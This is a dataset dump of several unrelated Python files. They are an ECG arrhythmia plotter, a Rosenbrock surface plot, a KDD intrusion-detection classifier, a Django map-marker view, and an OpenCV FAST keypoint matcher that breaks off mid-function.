QUEDA\n \n down_rr_true = [] # Los valores mayores a \n down_mean_rrvalues = [i22 for i22 in rr_values if i22 <= (rr_mean*0.85)] #0.1-0.5\n\n \n if (len(up_mean_rrvalues) + len(down_mean_rrvalues)) > 1:\n fuerade_rrmean = True\n elif up_mean_rrvalues or down_mean_rrvalues:\n fuerade_rrmean = True\n\n\n # BEATS PER MIMUNTE\n rateBPM = len(y_peaks)*60.0/(t_bloque[-1]-t_bloque[0])\n #print('BPM: '+ str(rateBPM))\n\n # ---------------- FIBRILACION AURICULAR ----------------\n if (fuerade_rrmean==True) and (RRv_variamucho==True):\n values['FA'] = True\n tiempos_plots.append([t_bloque[0],t_bloque[-1]])\n x_plots.append(t_bloque)\n y_plots.append(y_smooth)\n rrmean_values_plots.append(rrmean_values)\n rr_variability_plots.append(rr_values)\n rr_variabilitysum_plots.append(RRv_suma_all)\n rrmean_plots.append(rr_mean)\n bpm_plots.append(rateBPM)\n values['ARRITMIA_GENERAL'] = True\n elif (fuerade_rrmean==True):\n values['ARRITMIA_GENERAL'] = True\n else:\n values['FA'] = False\n values['ARRITMIA'] = False\n\n # Para conteo de figuras\n cont_fig = cont_fig+1\n \n # Para formar el Y FINAL\n for y_i in y_detrend:\n y_final.append(y_i)\n\n # LOOP ULTIMO\n if last_loop:\n break\n \n\n else:\n values['suficiente_tiempo'] = False\n print('No se adquirio suficiente tiempo')\n\n\n values['rr_mean'] = rr_mean\n values['up_rr_mean'] = rr_mean*1.15\n values['down_rr_mean'] = rr_mean*0.85\n\n values['rateBPM'] = rateBPM\n values['cycles_num'] = len(picos_todos)\n values['cycles'] = []\n cycles = []\n values['tiempos_plots'] = tiempos_plots\n\n for i in range(0,len(y_peaks)-1):\n cycles.append('Intervalo R-R #'+str(i+1)+' - #'+str(i+2) +': '+str(rateBPM))\n \n values['cycles'] = cycles\n\n #--------------------------------------------------\n\n trace1 = graph_objs.Scatter(\n x=t, y=y_final, \n mode='lines', name='signal'\n )\n\n layout = graph_objs.Layout(title='ECG ('+file_name+')',\n plot_bgcolor='rgb(230, 230,230)')\n \n\n ## ----------------- R-R MEAN Interval Plot --------------\n x_values_mean = range(0, len(rr_values_all))\n \n ups_mean = []\n for rr_up_mean in rr_mean_values_all:\n ups_mean.append(rr_up_mean*1.35) #2.5+0.5\n x_values_mean1 = range(0, len(ups_mean))\n\n downs_mean = []\n for down_up_mean in rr_mean_values_all:\n downs_mean.append(down_up_mean*0.85) #0.1-0.5\n x_values_mean2 = range(0, len(downs_mean))\n \n \n trace2 = graph_objs.Scatter(\n x=x_values_mean,\n y=rr_values_all,\n mode='markers',\n name='Intervalos MEAN R-R'\n )\n trace3 = graph_objs.Scatter(\n x=x_values_mean1,\n y=ups_mean,\n name='Limite MEAN R-R'\n )\n \n trace4 = graph_objs.Scatter(\n x=x_values_mean2,\n y=downs_mean,\n name='Limite MEAN R-R'\n )\n # -----------------------------------------------------\n\n # ----------------R-R Interval Plot--------------------\n x_values = range(0, len(rr_values_all))\n x_RRv_suma_all = range(0, len(RRv_suma_all))\n #rr_values_prom = sum(rr_values_all)/len(rr_values_all)\n \n rr_up = [1.1]*len(x_values)#[15]*len(x_values)\n rr_down = [0]*len(x_values)#[0]*len(x_values)\n\n trace5 = graph_objs.Scatter(\n x=x_values,\n y=RRv_suma_all,#RRv_all,\n mode='markers',\n name='Intervalos R-R'\n )\n trace6 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_up,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R'\n )\n trace7 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_down,#[sum(RRv_all)/len(RRv_all)*0.85, sum(RRv_all)/len(RRv_all)*0.85],#y=[rr_mean_prom*0.85, rr_mean_prom*0.85],\n name='Limite R-R'\n )\n \n data = [trace1, trace2, trace3, trace4, trace5]\n fig = tools.make_subplots(rows=3, cols=1, subplot_titles=('ECG', 'R-R Variabilidad'))\n fig.append_trace(trace1, 1, 1)\n fig.append_trace(trace2, 2, 1)\n fig.append_trace(trace3, 2, 1)\n fig.append_trace(trace4, 2, 1)\n fig.append_trace(trace5, 3, 1)\n fig.append_trace(trace6, 3, 1)\n fig.append_trace(trace7, 3, 1)\n fig['layout']['xaxis1'].update(title='Segundos', range=[5, 15])\n fig['layout']['yaxis1'].update(title='Milivoltios')\n fig['layout']['plot_bgcolor']='rgb(230, 230,230)'\n fig['layout']['xaxis2'].update(title='Bloques')#, range=[0, len(x_values)] )\n fig['layout']['yaxis2'].update(title='R-R Intervalos')\n fig['layout']['xaxis3'].update(title='Bloques')#, range=[0, len(x_values)+5])\n \n plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n\n # Si no se requiere plots, enviar 2 variables\n if divide_plots==False:\n return plot_div, values\n\n # --------------- Plots de Eventos -----------------\n event_plots = [] #Plots de eventos\n plot_cont = 0\n \n if len(tiempos_plots) > 0:\n for tiempos_plot in tiempos_plots:\n event_trace = graph_objs.Scatter(\n x=x_plots[plot_cont],\n y=y_plots[plot_cont],\n mode='lines',\n name = 'Evento Arritmico'\n )\n\n x_rr_plots = range(0, len(rr_variability_plots))\n event_trace2 = graph_objs.Scatter(\n x=x_rr_plots[plot_cont],\n y=rr_variability_plots[plot_cont],\n mode='markers',\n name='Variabilidad R-R'\n )\n\n rrmean_up_plots = []\n rrmean_up_plots.append(rrmean_plots[plot_cont]*1.35)\n rrmean_up_plots = rrmean_up_plots*len(rr_variability_plots[plot_cont])\n \n event_trace3 = graph_objs.Scatter(\n x=[0, len(rrmean_up_plots)],\n y=rrmean_up_plots,\n name='Limite MEAN R-R'\n )\n rrmean_down_plots = []\n rrmean_down_plots.append(rrmean_plots[plot_cont]*0.85)\n rrmean_down_plots = rrmean_down_plots*len(rr_variability_plots[plot_cont])\n \n event_trace4 = graph_objs.Scatter(\n x=[0, len(rrmean_down_plots)],\n y=rrmean_down_plots,\n name='Limite MEAN R-R'\n )\n\n #---------------------------------------------------------\n x_rrv_plots = range(0, len(rr_variabilitysum_plots[plot_cont]))\n rr_up_plots = [0.8]*len(x_rrv_plots)\n event_trace5 = graph_objs.Scatter(\n x=x_rrv_plots[plot_cont],\n y=rr_variabilitysum_plots[plot_cont],\n mode='markers',\n name='Suma de Variabilidad R-R'\n )\n event_trace6 = graph_objs.Scatter(\n x=[0, len(rr_up_plots)],\n y=rr_up_plots,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R (propio)'\n )\n\n subplot_titles = ('Evento: del segundo '+ str(int(tiempos_plot[0]))+' - al segundo '+str(int(tiempos_plot[1])), \n 'R-R Variabilidad')\n event_fig = tools.make_subplots(rows=3, cols=1, subplot_titles=subplot_titles)\n event_fig.append_trace(event_trace, 1, 1)\n event_fig.append_trace(event_trace2, 2, 1)\n event_fig.append_trace(event_trace3, 2, 1)\n event_fig.append_trace(event_trace4, 2, 1)\n event_fig.append_trace(event_trace5, 3, 1)\n event_fig.append_trace(event_trace6, 3, 1)\n event_fig['layout']['xaxis1'].update(title='Segundos')\n event_plot = plot(event_fig, output_type='div', include_plotlyjs=False)\n event_plots.append(event_plot)\n plot_cont += 1\n # --------------------------------------------------\n return plot_div, values, event_plots", "sub_path": "apps/information/utils/ecg_plotter.py", "file_name": "ecg_plotter.py", "file_ext": "py", "file_size_in_byte": 18743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 74, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 75, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 78, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "detect_peaks.detect_peaks", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 352, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 352, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 357, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 357, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 375, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 375, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 381, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 381, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 387, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 387, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 402, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 402, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 408, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 408, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 413, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 413, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 420, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 420, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 435, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 447, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 455, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 455, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 466, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 466, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 475, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 475, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 484, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 484, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 490, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 490, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 498, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 498, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 506, "usage_type": "call"}]} +{"seq_id": "390541034", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 15:17:43 2017\n\n@author: Mike\n\"\"\"\n\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\ndef first(x, y):\n return (100 *(y-x**2)**2 + (1-x)**2)\nx = arange(-6.0,5.0,0.1)\ny = arange(-6.0,5.0,0.1)\nX,Y = meshgrid(x, y) \nZ = first(X, Y)\n'''\nim = imshow(Z,cmap=cm.RdBu) # drawing the function\n# adding the Contour lines with labels\ncset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)\nplt([1],[1])\nclabel(cset,inline=True,fmt='%1.1f',fontsize=10)\ncolorbar(im) # adding the colobar on the right\n# latex fashion title\ntitle('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')\nshow()\n'''\nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, \n cmap=cm.RdBu,linewidth=0, antialiased=False)\nax.plot([1],[1],'go')\nax.zaxis.set_major_locator(LinearLocator(10))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=.5, aspect=5)\nplt.show()", "sub_path": "Numerical Optimization Problems/first.py", "file_name": "first.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "132179668", "text": "from sklearn.datasets import fetch_openml\nimport pandas as pd\nimport numpy as np\nimport pickle\n\ndata = '''back dos\nbuffer_overflow u2r\nftp_write r2l\nguess_passwd r2l\nimap r2l\nipsweep probe\nland dos\nloadmodule u2r\nmultihop r2l\nneptune dos\nnmap probe\nperl u2r\nphf r2l\npod dos\nportsweep probe\nrootkit u2r\nsatan probe\nsmurf dos\nspy r2l\nteardrop dos\nwarezclient r2l\nwarezmaster r2l'''\n\n# grouped by type\nattack_types = pd.DataFrame([row.split() for row in data.split('\\n')], columns=['name','type'])\nattack_type_groups = attack_types.groupby('type')['name'].unique()\n\nprint('attack group types: {}'.format(', '.join(attack_type_groups.index)))\nprint()\nprint(attack_type_groups)\n\n#X = features\n#y = label (target)\nfrom sklearn.datasets import fetch_openml\nX, y = fetch_openml(data_id='1113', return_X_y=True, as_frame=True)\nprint('n records: {}'.format(len(X.index)))\nX_preserved = X.copy()\ny_preserved = y.copy()\n\ndef get_attack_type_downsampled_balanced_subset(attack_names, label, X, y):\n print('Attack group name: {}'.format(label))\n print('Attack_types: {}'.format(', '.join(attack_names)))\n \n is_type_attack = y.isin(attack_names)\n \n only_attack_type = y[is_type_attack]\n only_not_attack_type = y[~is_type_attack]\n \n only_attack_type = is_type_attack[is_type_attack]\n only_not_attack_type = is_type_attack[~is_type_attack]\n \n \n num_attack_type = only_attack_type.shape[0]\n num_not_attack_type = only_not_attack_type.shape[0]\n \n print('Num attack type: {}'.format(num_attack_type))\n print('Num not attack type: {}'.format(num_not_attack_type))\n \n\n # Take a balanced sample\n # which one has less? that is the one we should downsample\n lowest_count = min(num_attack_type, num_not_attack_type)\n \n balanced_ys = []\n balanced_Xs = []\n for subset_y in [only_attack_type, only_not_attack_type]:\n _subset_y = subset_y.copy()\n if _subset_y.shape[0] > lowest_count:\n _subset_y = subset_y.sample(n=lowest_count)\n subset_X = X.loc[_subset_y.index, :]\n balanced_Xs.append(subset_X)\n balanced_ys.append(_subset_y)\n \n assert len(balanced_Xs) == len(balanced_ys)\n \n for i, balanced_y in enumerate(balanced_ys):\n assert balanced_y.shape[0] == lowest_count\n assert balanced_Xs[i].shape[0] == lowest_count\n \n X_new = pd.concat(balanced_Xs)\n y_new = pd.concat(balanced_ys).rename(label)\n \n print(X_new.shape[0])\n print(y_new.shape[0])\n print()\n \n return X_new, y_new\n\nX_is_dos, y_is_dos = get_attack_type_downsampled_balanced_subset(attack_type_groups['dos'], 'is_dos_attack', X, y)\nX_is_probe, y_is_probe = get_attack_type_downsampled_balanced_subset(attack_type_groups['probe'], 'is_probe_attack', X, y)\nX_is_r2l, y_is_r2l = get_attack_type_downsampled_balanced_subset(attack_type_groups['r2l'], 'is_r2l_attack', X, y)\nX_is_u2r, y_is_u2r = get_attack_type_downsampled_balanced_subset(attack_type_groups['u2r'], 'is_u2r_attack', X, y)\n\nX, y = X_is_probe, y_is_probe\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression, RidgeClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\nnp.random.seed(0)\n\n#column transformer\n\nnumeric_features = ['src_bytes','dst_bytes']\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\ncategorical_features = ['protocol_type']\n#categorical_features = []\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\nimport matplotlib.pyplot as plt\n\nclassifiers = [\n LogisticRegression()\n]\n\nclf = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', None)])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=0)\n\nprint('Training Features Shape:', X_train.shape)\nprint('Training Labels Shape:', y_train.shape)\nprint('Testing Features Shape:', X_test.shape)\nprint('Testing Labels Shape:', y_test.shape)\n\nroc_things = []\nprecision_recall_things = []\n\nfor classifier in classifiers:\n clf.set_params(clf=classifier).fit(X_train, y_train)\n classifier_name = classifier.__class__.__name__\n print(str(classifier))\n print(\"model score: %.3f\" % clf.score(X_test, y_test))\n\n y_score = clf.predict_proba(X_test)[:,1]\n\n y_pred = clf.predict(X_test)\n \n roc_auc = roc_auc_score(y_test, y_score)\n fpr, tpr, _ = roc_curve(y_test, y_score)\n roc_things.append((fpr, tpr, '{} AUC: {:.3f}'.format(classifier_name, roc_auc)))\n \n precision, recall, thresholds = precision_recall_curve(y_test, y_score)\n pr_auc = auc(recall, precision)\n precision_recall_things.append((recall, precision, thresholds, '{} AUC: {:.3f}'.format(classifier_name, pr_auc)))\n #plot_precision_recall_curve(clf, X_test, y_test)\n \n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n\n print('average precision score: {:.3f}'.format(average_precision_score(y_test, y_score)))\n print('roc_auc_score: {:.3f}'.format(roc_auc))\n print('precision-recall AUC: {:.3f}'.format(pr_auc))\n print()\n\nroc_plt = plt.figure()\nlw = 4\nfor roc_thing in roc_things:\n fpr, tpr, label = roc_thing\n plt.plot(fpr, tpr, lw=lw, label=label)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.legend()\nplt.title('ROC curve')\n\npr_plt = plt.figure()\nfor pr_thing in precision_recall_things:\n recall, precision, _, label = pr_thing\n plt.plot(recall, precision, lw=lw, label=label)\nratio = y_test[y_test].shape[0] / y_test.shape[0]\nplt.hlines(y=ratio, xmin=0, xmax=1, color='navy', lw=lw, linestyle='--')\nplt.title('Precision-recall plot')\nplt.legend()\n\nwith open('{}.pkl'.format(classifier_name), 'wb') as f:\n pickle.dump(clf, f)", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 174, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 183, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.metrics.average_precision_score", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "238273921", "text": "from django.shortcuts import render\n\nfrom about.forms import CommentForm\nfrom about.models import Comment\nfrom map.forms import MarkForm\nfrom map.models import MapMarks\nfrom django.http import JsonResponse\n\ndef Map(request):\n if request.method == \"GET\":\n if request.is_ajax():\n if request.GET[\"type\"] == '1':\n mark = MapMarks.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(mark.first())\n else:\n comment = Comment.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(comment.first())\n else:\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n form_comment = CommentForm()\n form_mark = MarkForm()\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form_comment\": form_comment, \"form_mark\": form_mark})\n else:\n if (request.POST[\"type\"] == 1):\n data = CommentForm(request.POST)\n else:\n data = MarkForm(request.POST, request.FILES)\n\n if (data.data[\"type\"] == '1'):\n comment = Comment()\n comment.comment = data.data[\"comment\"]\n comment.username = data.data[\"username\"]\n comment.id_mark = data.data[\"id_mark\"]\n mark = MapMarks.objects.get(id = data.data[\"id_mark\"])\n comment.save()\n mark.id_comment = mark.id_comment + str(comment.id) + '_'\n mark.save()\n else:\n mark = MapMarks()\n mark.comment = data.data[\"comment\"]\n mark.name = data.data[\"name\"]\n mark.image = data.files[\"image\"]\n mark.position_y = float(data.data[\"position_y\"])\n mark.position_x = float(data.data[\"position_x\"])\n mark.save()\n form = CommentForm()\n form_mark = MarkForm()\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form\": form, \"form_mark\": form_mark})", "sub_path": "map/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "map.models.MapMarks.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 14, "usage_type": "call"}, {"api_name": "about.models.Comment.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "about.models.Comment.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "about.models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 19, "usage_type": "name"}, {"api_name": "about.forms.CommentForm", "line_number": 20, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 25, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 27, "usage_type": "call"}, {"api_name": "about.models.Comment", "line_number": 30, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.get", "line_number": 34, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 34, "usage_type": "name"}, {"api_name": "map.models.MapMarks", "line_number": 39, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 46, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 47, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "644688010", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport matcher\nfig = plt.figure()\n\ndef camera_capture():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n fig.add_subplot(1, 2, 1)\n cv2.imshow('bgr', frame)\n fig.add_subplot(1, 2, 2)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\ndef normalized(img):\n # half-sampling\n img = cv2.resize(img, (0, 0), fx = 0.5, fy = 0.5)\n # filter\n kernel_size = 2\n kernel = np.ones((kernel_size, kernel_size), np.float32) / (kernel_size ** 2)\n img = cv2.filter2D(img, -1, kernel)\n return img\n\ndef fast_matching():\n fast = cv2.FastFeatureDetector_create(type = cv2.FastFeatureDetector_TYPE_7_12, nonmaxSuppression = True)\n img_src = cv2.imread('./resource/P_20180407_120033.jpg', 0);\n img_dst = cv2.imread('./resource/P_20180407_120034.jpg', 0);\n\n # normalize\n img_src = normalized(img_src)\n img_dst = normalized(img_dst)\n \n # get keypoints\n kp_src = fast.detect(img_src, None)\n kp_dst = fast.detect(img_dst, None)\n\n # matching\n matchX, matchY, cost_mat = matcher.stable_SSD(img_src, kp_src, img_dst, kp_dst, max_dist = 25)\n dmatch = [cv2.DMatch(i, matchX[i], cost_mat[i][matchX[i]]) for i in range(len(kp_src)) if matchX[i] < len(kp_dst)]\n dmatch.sort(key = lambda x: x.distance)\n \n # draw matches\n img_res = cv2.drawMatches(img_src, kp_src, img_dst, kp_dst, dmatch[:int(0.2 * len(dmatch))], outImg = None, flags = 2)\n \n# fig.add_subplot(1, 2, 1)\n# plt.imshow(img_src)\n# fig.add_subplot(1, 2, 2)\n# plt.imshow(img_dst)\n plt.imshow(img_res)\n\n mng = plt.get_current_fig_manager()\n 